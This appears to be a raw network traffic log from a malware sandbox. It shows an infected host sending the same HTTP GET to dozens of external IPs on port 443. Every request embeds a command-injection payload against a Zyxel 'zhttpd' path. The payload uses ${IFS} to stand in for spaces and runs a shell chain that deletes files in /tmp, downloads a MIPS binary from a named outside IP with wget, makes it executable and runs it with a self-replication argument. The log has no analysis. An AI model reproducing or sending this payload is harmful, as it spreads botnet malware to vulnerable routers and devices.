                                                Jan 29, 2024 07:07:57.529531956 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6826192.168.2.2345246105.195.58.167443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:57.529572010 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6827192.168.2.235315254.207.43.3443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:57.529634953 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6828192.168.2.2356904163.83.242.192443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:57.529644012 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6829192.168.2.233867842.118.233.40443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:57.529680967 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6830192.168.2.2358624190.201.95.0443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:57.529722929 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6831192.168.2.234052663.216.171.220443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:57.529755116 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6832192.168.2.234558023.92.81.123443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:57.529825926 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6833192.168.2.2344798106.142.183.150443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:57.529845953 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6834192.168.2.233826667.155.149.122443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:57.529881001 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6835192.168.2.2345070119.9.246.99443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:57.529918909 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6836192.168.2.2352136123.173.237.150443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:57.529973984 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6837192.168.2.2354436117.3.175.45443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:57.530009985 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6838192.168.2.233295297.203.135.119443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:57.530040979 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6839192.168.2.23549282.96.53.222443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:57.530077934 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6840192.168.2.234377641.107.96.125443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:57.530122042 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6841192.168.2.235528273.59.126.156443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:57.530191898 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6842192.168.2.235351485.138.195.109443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:57.530194998 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6843192.168.2.2335828136.98.20.193443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:57.533195019 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6844192.168.2.235275091.80.50.255443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:57.533612967 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6845192.168.2.2350034179.15.20.24443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:57.533654928 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6846192.168.2.2359890128.59.188.110443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:57.533739090 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6847192.168.2.2346270197.197.119.92443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:57.533739090 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6848192.168.2.234523218.221.214.118443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:57.533739090 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6849192.168.2.2357520146.118.186.215443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:57.533785105 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6850192.168.2.2354090216.180.216.243443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:57.533806086 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6851192.168.2.2360076148.47.32.74443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:57.533864975 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6852192.168.2.235764860.18.152.84443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:58.542907000 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6853192.168.2.2347544188.13.138.189443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:58.542937040 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6854192.168.2.235407863.175.126.161443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:58.542959929 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6855192.168.2.2345170212.252.70.14443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:58.542996883 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6856192.168.2.233951425.72.219.201443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:58.543032885 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6857192.168.2.2338200223.75.74.112443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:58.543072939 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6858192.168.2.234254617.95.21.153443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:58.543109894 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6859192.168.2.233955480.0.198.170443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:58.543176889 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6860192.168.2.2347562123.131.223.220443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:58.543220043 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6861192.168.2.2356176158.76.227.220443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:58.543243885 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6862192.168.2.234542649.255.206.144443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:58.543272018 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6863192.168.2.235063242.221.199.74443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:58.543359041 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6864192.168.2.235366270.128.234.225443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:58.543368101 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6865192.168.2.2340280221.201.224.191443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:58.543416023 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6866192.168.2.2346760109.50.212.166443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:58.543462992 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6867192.168.2.2339462184.24.23.188443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:58.543492079 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6868192.168.2.2342402200.172.50.207443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:58.543539047 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6869192.168.2.2354598197.108.234.30443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:58.543555021 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6870192.168.2.233540034.202.211.177443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:58.543621063 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6871192.168.2.233894817.224.157.11443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:58.543651104 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6872192.168.2.2340124198.208.0.56443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:58.543677092 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6873192.168.2.234675479.95.52.230443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:58.543709040 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6874192.168.2.2341156189.238.123.121443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:58.543764114 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6875192.168.2.2355084218.7.154.132443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:58.543807030 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6876192.168.2.2348090173.197.208.42443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:58.543857098 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6877192.168.2.234373496.213.126.139443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:58.543865919 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6878192.168.2.233614418.199.244.226443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:58.543911934 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6879192.168.2.2343964203.160.255.102443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:58.543935061 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6880192.168.2.2350498151.213.65.173443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:58.543979883 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6881192.168.2.2346254187.174.198.8443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:58.544048071 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6882192.168.2.2334006163.158.38.238443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:58.544080973 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6883192.168.2.2358804107.230.31.63443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:58.544172049 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6884192.168.2.23523248.128.86.77443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:58.544181108 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6885192.168.2.2360388131.70.244.235443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:58.544188023 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6886192.168.2.2355546137.130.109.6443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:58.544235945 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6887192.168.2.234308051.52.234.218443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:58.544264078 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6888192.168.2.2338708106.187.129.227443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:58.544296026 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6889192.168.2.2353030163.250.236.35443
                                                TimestampBytes transferredDirectionData
